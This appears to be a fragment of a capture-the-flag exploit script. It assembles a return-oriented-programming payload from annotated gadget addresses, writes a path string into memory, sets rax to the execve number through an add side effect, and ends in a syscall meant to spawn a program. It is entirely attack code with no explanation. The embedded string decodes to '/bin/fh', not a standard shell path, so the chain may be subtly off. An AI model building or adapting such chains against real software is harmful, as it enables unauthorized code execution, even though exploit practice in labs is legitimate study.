payload = p64(0x4017d3)
#0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4b4068)+p64(0x47eae3)
# 0x000000000047eae3: pop rsi; ret; 
payload += p64(0x68662f6e69622f)+p64(0x4140e6)
# 0x00000000004140e6: mov qword ptr [rdi + 8], rsi; pop rbp; ret; 
payload += p64(0x0)+p64(0x45ea98)
# 0x000000000045ea98: pop rdx; add eax, 0x7fbb030b; cmp al, 5; adc eax, 0x31b05a2; ret; 
payload += p64(0x0)+p64(0x4017d3)
# 0x00000000004017d3: pop rdi; ret; 
payload += p64(0x4b4070)+p64(0x47eae3)
# 0x000000000047eae3: pop rsi; ret; 
payload += p64(0x0)+p64(0x409fe1)
# 0x0000000000409fe1: pop rax; add eax, 0x83480000; ret; 
payload += p64(0x7cb8003b)+p64(0x407ea8)
# 0x0000000000407ea8: syscall; 
payload += b''
